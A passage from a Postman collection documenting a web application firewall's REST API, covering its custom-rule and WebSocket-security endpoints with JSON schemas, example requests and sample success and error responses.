{{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","customrule"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:53:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"164"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"36e2a12b-9341-11e9-a71e-7bb947d6e9fb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkqdKGS3IAMF8Ww="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b5787-7c233828127cfbf0b64712b0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"custom_rules\": [\n            {\n                \"rules\": [],\n                \"bot-recognition\": \"disabled\",\n                \"name\": \"rule1\",\n                \"action\": \"alert_deny\"\n            }\n        ]\n    }\n}"},{"id":"5bb2ce57-faca-4bde-a459-e04162bafe1f","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","customrule"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:53:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"492242ba-9341-11e9-8920-d7d1b5164db5"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkqh8FZVoAMFc3w="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"8ffada1d-9b54-411a-9c57-da545cf01e92"},{"name":"Update Custom Rule","id":"4ef37fcb-f5eb-48c8-8f75-6785ac3ab3f6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"custom_rules\": [\n        {\n            \"bot-recognition\": \"disabled\",\n            \"action\": \"alert_deny\",\n            \"block-period\": 60,\n            \"rules\": [\n            {\"id\": \"1\", \"source-ip\": \"20.2.3.5-20.2.3.40\", \"exclusive-match\": \"no\", \"filter_type\": \"source-ip-filter\"},\n            {\"id\": \"2\", \"filter_type\": \"url-filter\", \"reverse-match\": \"yes\", \"request-file\": \"/testfile\"},\n            {\"id\": \"3\", \"filter_type\": \"http-header-filter\", \"header-field-check\": \"enable\", \"header-name-type\": \"predefined\",\n             \"predefined-header\": \"Accept\", \"header-value\": \"regxxx\", \"pre-header-rev-match\": \"enable\"},\n            {\"id\": \"12\", \"filter_type\": \"http-header-filter\", \"header-field-check\": \"enable\", \"header-name-type\": \"custom\",\n             \"custom-header-name\": \"xxcustom\", \"header-value\": \"regxxx\", \"cus-header-rev-match\": \"enable\", \"http-method-check\": \"enable\", \"http-method-value\": \"xfe\", \"http-method-rev-match\": \"enable\"},\n            {\"id\": \"4\", \"filter_type\": \"access-limit-filter\", \"access-rate-limit\": \"113\"},\n            {\"id\": \"13\", \"filter_type\": \"http-header-filter\", \"http-method-check\": \"enable\", \"http-method-value\": \"xfe\", \"http-method-rev-match\": \"enable\"},\n            {\"id\": \"5\", \"filter_type\": \"http-transaction\", \"http-transaction-timeout\": \"123\"},\n            {\"id\": \"6\", \"filter_type\": \"response-code\", \"response-code\": \"200-400\"},\n            {\"id\": \"7\", \"filter_type\": \"packet-interval\", \"packet-interval-timeout\": \"13\"},\n            {\"id\": \"8\", \"filter_type\": \"parameter\", \"name\": \"fexx\", \"value\": \"noneed\"},\n            {\"id\": \"9\", \"filter_type\": \"content-type\", \"content-type-set\": \"text/plain text/html\"},\n            {\"id\": \"10\", \"filter_type\": \"occurrence\", \"occurrence-num\": 113, \"within\": 36},\n            {\"id\": \"11\", \"filter_type\": \"security-rules\", \"cross-site-scripting\": \"enable\", \"sql-injection\": \"enable\", \"generic-attacks\": \"enable\",\n             \"known-exploits\": \"enable\", \"trojans\": \"enable\"}\n            ],\n            \"name\": \"rule1\"\n        }\n    ]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","description":"<p>Update the configuration information of custom rule. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"_status\"],\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable custom rule\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"custom_rules\": {\n            \"description\": \"The custom rule list\",\n            \"type\": \"array\",\n            \"maxItem\": 32,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"id\", \"filter_type\"],\n                \"properties\": {\n                    \"id\": {\n                        \"description\": \"The sequence number of the custom rule\",\n                        \"type\": \"integer\"\n                    },\n                    \"filter_type\": {\n                        \"description\": \"Select the filter types that a request must match in order to be allowed\",\n                        \"type\": \"string\",\n                        \"enum\": [\"security-rules\", \"occurrence\", \"content-type\", \"parameter\", \"packet-interval\", \"response-code\", \"http-transaction\", \"access-limit-filter\", \"source-ip-filter\", \"url-filter\", \"http-header-filter\"]\n                    },\n                    \"cross-site-scripting\": {\n                        \"description\": \"Configure to prevent a variety of cross-site scripting (XSS) attacks, such as varieties of CSRF string\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"sql-injection\": {\n                        \"description\": \"Configure to prevent SQL injection attacks, such as blind SQL injection\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"generic-attacks\": {\n                        \"description\": \"Configure to prevent other common attacks, including a variety of injection threats that do not use SQL, such as local file inclusion (LFI) and remote file inclusion (RFI)\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"known-exploits\": {\n                        \"description\": \"Configure to prevent known exploits\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"trojans\": {\n                        \"description\": \"Confgure to prevent malware attacks and prevent accessing Webshell located on server\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"source-ip\": {\n                        \"description\": \"The IPv4/IP range\",\n                        \"type\": \"string\",\n                    },\n                    \"exclusive-match\": {\n                        \"description\": \"Set whether the condition can be met when source IP does not match\",\n                        \"type\": \"string\",\n                        \"enum\": [\"yes\", \"no\"],\n                        \"default\": \"no\"\n                    },\n                    \"reverse-match\": {\n                        \"description\": \"Indicate how to use the user name when determining whether or not this rule’s condition has been met\",\n                        \"type\": \"string\",\n                        \"enum\": [\"yes\", \"no\"],\n                        \"default\": \"no\"\n                    },\n                    \"request-file\": {\n                        \"description\": \"A regular expression that defines either all matching or all non-matching URLs\",\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"header-field-check\": {\n                        \"description\": \"Configure to enable or disable checking the HTTP header field\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"header-name-type\": {\n                        \"description\": \"Select whether to define the HTTP header filter by selecting a predefined HTTP header name, or by typing the name of a custom HTTP header\",\n                        \"type\": \"string\",\n                        \"enum\": [\"predefined\", \"custom\"],\n                        \"default\": \"predefined\"\n                    },\n                    \"predefined-header\": {\n                        \"description\": \"Select the name (key) of the HTTP header such as Accept: that must be present in order for the request to be allowed\",\n                        \"type\": \"string\",\n                        \"enum\": [\"Accept\", \"X-Forwarded-For\", \"authorization\", \"connection\", \"cookie\", \"referer\", \"user-agent\", \"x-pad\"]\n                    },\n                    \"header-value\": {\n\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"pre-header-rev-match\": {\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"custom-header-name\": {\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"cus-header-rev-match\": {\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"http-method-check\": {\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"http-method-value\": {\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"http-method-rev-match\": {\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"response-code\": {\n                        \"type\": \"integer\"\n                    },\n                    \"packet-interval-timeout\": {\n                        \"type\": \"number\",\n                        \"minimum\": 1,\n                        \"maximum\": 60\n                    },\n                    \"name\": {\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"value\": {\n                        \"type\": \"string\",\n                        \"pattern\": \".*\"\n                    },\n                    \"content-type-set\": {\n                        \"type\": \"string\",\n                        \"enum\": [\"text/html\", \"text/plain\", \"text/xml\", \"application/xml\", \"application/soap+xml\", \"application/json\"]\n                    },\n                    \"occurrence-num\": {\n                        \"type\": \"number\",\n                        \"minimum\": 1,\n                        \"maximum\": 100000\n                    },\n                    \"within\": {\n                        \"type\": \"number\",\n                        \"minimum\": 1,\n                        \"maximum\": 600\n                    }\n                }\n            }\n        }\n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Authentication</b> section for API key secret details.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","customrule"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"12cd5831-bfb4-4b1d-a2c2-5f1de44365a0","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"custom_rules\": [\n        {\n            \"bot-recognition\": \"disabled\",\n            \"action\": \"alert_deny\",\n            \"block-period\": 60,\n            \"rules\": [\n            {\"id\": \"1\", \"source-ip\": \"20.2.3.5-20.2.3.40\", \"exclusive-match\": \"no\", \"filter_type\": \"source-ip-filter\"},\n            {\"id\": \"2\", \"filter_type\": \"url-filter\", \"reverse-match\": \"yes\", \"request-file\": \"/testfile\"},\n            {\"id\": \"3\", \"filter_type\": \"http-header-filter\", \"header-field-check\": \"enable\", \"header-name-type\": \"predefined\",\n             \"predefined-header\": \"Accept\", \"header-value\": \"regxxx\", \"pre-header-rev-match\": \"enable\"},\n            {\"id\": \"12\", \"filter_type\": \"http-header-filter\", \"header-field-check\": \"enable\", \"header-name-type\": \"custom\",\n             \"custom-header-name\": \"xxcustom\", \"header-value\": \"regxxx\", \"cus-header-rev-match\": \"enable\", \"http-method-check\": \"enable\", \"http-method-value\": \"xfe\", \"http-method-rev-match\": \"enable\"},\n            {\"id\": \"4\", \"filter_type\": \"access-limit-filter\", \"access-rate-limit\": \"113\"},\n            {\"id\": \"13\", \"filter_type\": \"http-header-filter\", \"http-method-check\": \"enable\", \"http-method-value\": \"xfe\", \"http-method-rev-match\": \"enable\"},\n            {\"id\": \"5\", \"filter_type\": \"http-transaction\", \"http-transaction-timeout\": \"123\"},\n            {\"id\": \"6\", \"filter_type\": \"response-code\", \"response-code\": \"200-400\"},\n            {\"id\": \"7\", \"filter_type\": \"packet-interval\", \"packet-interval-timeout\": \"13\"},\n            {\"id\": \"8\", \"filter_type\": \"parameter\", \"name\": \"fexx\", \"value\": \"noneed\"},\n            {\"id\": \"9\", \"filter_type\": \"content-type\", \"content-type-set\": \"text/plain text/html\"},\n            {\"id\": \"10\", \"filter_type\": \"occurrence\", \"occurrence-num\": 113, \"within\": 36},\n            {\"id\": \"11\", \"filter_type\": \"security-rules\", \"cross-site-scripting\": \"enable\", \"sql-injection\": \"enable\", \"generic-attacks\": \"enable\",\n             \"known-exploits\": \"enable\", \"trojans\": \"enable\"}\n            ],\n            \"name\": \"rule1\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","customrule"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 27 Jun 2019 01:46:32 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"638f99ef-987d-11e9-8051-d1b8b1ea0d3d"},{"key":"Access-Control-Allow-Origin","value":"https://www.timweb-cloud-test.com "},{"key":"x-amz-apigw-id","value":"b6nuwHLPoE0FrrA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d141ff8-c16d12c1583d4a6b3f588c96;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"6afa9958-b1a7-464a-8348-1ebae02b232d","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"custom_rules\": [\n        {\n            \"bot-recognition\": \"disabled\",\n            \"action\": \"alert_deny\",\n            \"block-period\": 0,\n            \"rules\": [],\n            \"name\": \"rule1\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","customrule"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:51:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"84"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"01eac0a8-9341-11e9-aaba-d1394f35a835"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkqPRGELoAMFzMQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b572e-f30e65a9a2fd967b55b0bb85;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'block-period': 'Error value range, only allow 1-3600'}\"\n}"}],"_postman_id":"4ef37fcb-f5eb-48c8-8f75-6785ac3ab3f6"},{"name":"Get WebSocket Security","id":"48135307-ff23-4276-9b19-7753389e12bd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/websocketsecurity","description":"<p>Get the configuration information of WebSocket Security.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","websocketsecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"50107b7b-14ef-4ccb-a80e-6f287c80a051","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/WebSocketSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","WebSocketSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:06:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c57bf451-7acd-11e9-8761-217ac95003c8"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-G9DHKbIAMFg-g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"a096cc0f-e443-4f25-bc8c-27101ec3f074","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/WebSocketSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","WebSocketSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:15:34 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"369"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"0f2eb946-7acf-11e9-b655-f782b06353cb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-ITfFQtIAMFlFQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce25416-a51823fa907fb95b4fa604aa;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"template_status\": \"disable\",\n        \"WebSocketSecurity\": {\n            \"rule-list\": [\n                {\n                    \"seq\": \"1\",\n                    \"allow-plain-text\": \"enable\",\n                    \"block-extensions\": \"enable\",\n                    \"allowed-origin-list\": [\n                        {\n                            \"name\": \"1\",\n                            \"origin\": \"orig1\"\n                        }\n                    ],\n                    \"name\": \"rule1\",\n                    \"enable-attack-signatures\": \"enable\",\n                    \"block-websocket-traffic\": \"enable\",\n                    \"url\": \"/test\",\n                    \"allow-binary-text\": \"enable\"\n                }\n            ]\n        }\n    }\n}"}],"_postman_id":"48135307-ff23-4276-9b19-7753389e12bd"},{"name":"Update WebSocket Security","id":"99d27570-f81e-48bd-8420-9854aa5675eb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"WebSocketSecurity\": {\n        \"rule-list\": [\n            { \n            \t\"seq\": 1,\n                \"allow-plain-text\":\"enable\",\n                \"block-extensions\":\"disable\",\n                \"allowed-origin-list\":[{\"name\":\"1\",\"origin\":\"ore\"}],\n                \"name\":\"rule1\",\n                \"enable-attack-signatures\":\"enable\",\n                \"block-websocket-traffic\":\"enable\",\n                \"url\":\"/test111111\",\n                \"allow-binary-text\":\"enable\"\n            }\n        ]\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/websocketsecurity","description":"<p>Update the configuration information of WebSocket security. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"WebSocketSecurity\"],\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable websocket security\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"Select which action TIM Host Protection will take when it detects a violation of the WebSocket security policy.\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\"],\n            \"default\": \"alert_deny\"\n        },\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"WebSocketSecurity\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"rule-list\": {\n                    \"description\": \"The WebSocket security rule list\",\n                    \"type\": \"array\",\n                    \"maxItems\": 12,\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"required\": [\"seq\", \"name\", \"url\"],\n                        \"properties\": {\n                            \"seq\": {\n                                \"description\": \"The sequence number of the rule in the rule list\",\n                                \"type\": \"integer\"\n                            },\n                            \"name\": {\n                                \"description\": \"The created WebSocket security rule name\",\n                                \"type\": \"string\",\n                                \"maxLength\": 39\n                            },\n                            \"url\": {\n                                \"description\": \"The URL which hosts the web page containing the user input fields you want to protect\",\n                                \"type\": \"string\",\n                                \"maxLength\": 255,\n                                \"pattern\": \"/.*\"\n                            },\n                            \"allow-plain-text\": {\n                                \"description\": \"Configure to enable or disable to allow detecting the plain text.string\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            },\n                            \"block-extensions\": {\n                                \"description\": \"Configure to enable or disable to not check the extension header in WebSocket handshake packet\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            },\n                            \"allowed-origin-list\": {\n                                \"description\": \"The origin list ID in WebSocket handshake packet\",\n                                \"type\": \"array\",\n                                \"maxItems\": 256,\n                                items: {\n                                    \"type\": \"object\",\n                                    \"properties\": {\n                                        \"name\": {\n                                            \"description\": \"The sequence number of the origin\",\n                                            \"type\": \"string\",\n                                            \"maxLength\": 255\n                                        },\n                                        \"origin\": {\n                                            \"description\": \"The origin name\",\n                                            \"type\": \"string\",\n                                            \"maxLength\": 255\n                                        }\n                                    }\n                                }\n                            },\n                            \"enable-attack-signatures\": {\n                                \"description\": \"Configure to detect attack in WebSocket message body\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            },\n                            \"block-websocket-traffic\": {\n                                \"description\": \"Configure to deny the WebSocket traffic, and TIM Host Protection will not check any WebSocket related traffic\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            },\n                            \"allow-binary-text\": {\n                                \"description\": \"Configure to allow detecting the binary text\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","websocketsecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4bea6286-3f06-4241-9b1f-3ac572545652","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"WebSocketSecurity\": {\n        \"rule-list\": [\n            { \n                \"allow-plain-text\":\"enable\",\n                \"block-extensions\":\"disable\",\n                \"allowed-origin-list\":[{\"name\":\"1\",\"origin\":\"ore\"}],\n                \"name\":\"rule1\",\n                \"enable-attack-signatures\":\"enable\",\n                \"block-websocket-traffic\":\"enable\",\n                \"url\":\"/test111111\",\n                \"allow-binary-text\":\"enable\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/WebSocketSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","WebSocketSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 09:41:24 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6e51a507-7ae3-11e9-a865-db583892536d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-dqmGa6oAMFU1g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce27643-27dd7398a67e4cd1456e5dc4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'seq': 'The rule seq is not blank!'}\"\n}"},{"id":"d90e8a1c-1128-413a-8618-0798ed2988b9","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"WebSocketSecurity\": {\n        \"rule-list\": [\n            {\n                \"seq\": \"1\", \n                \"allow-plain-text\":\"enable\",\n                \"block-extensions\":\"disable\",\n                \"allowed-origin-list\":[{\"name\":\"1\",\"origin\":\"ore\"}],\n                \"name\":\"rule1\",\n                \"enable-attack-signatures\":\"enable\",\n                \"block-websocket-traffic\":\"enable\",\n                \"url\":\"/test111111\",\n                \"allow-binary-text\":\"enable\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/WebSocketSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","WebSocketSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 09:36:35 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c29b5d12-7ae2-11e9-94ed-f52bb159ee25"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-c9lGUYoAMFzxQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"f0f29882-aa60-4c8a-9762-5e9c81a5d2fb","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"WebSocketSecurity\": {\n        \"rule-list\": [\n            {\n                \"seq\": \"1\", \n                \"allow-plain-text\":\"enable\",\n                \"block-extensions\":\"disable\",\n                \"allowed-origin-list\":[{\"name\":\"1\",\"origin\":\"ore\"}],\n                \"name\":\"rule1\",\n                \"enable-attack-signatures\":\"enable\",\n                \"block-websocket-traffic\":\"enable\",\n                \"url\":\"/test111111\",\n                \"allow-binary-text\":\"enable\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/WebSocketSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","WebSocketSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 09:37:35 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e5c4d3d0-7ae2-11e9-92c4-49b99d8df20c"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-dGzG1uoAMFvuA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce2755e-53edab0cc56a503003bb1408;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"99d27570-f81e-48bd-8420-9854aa5675eb"},{"name":"Get API 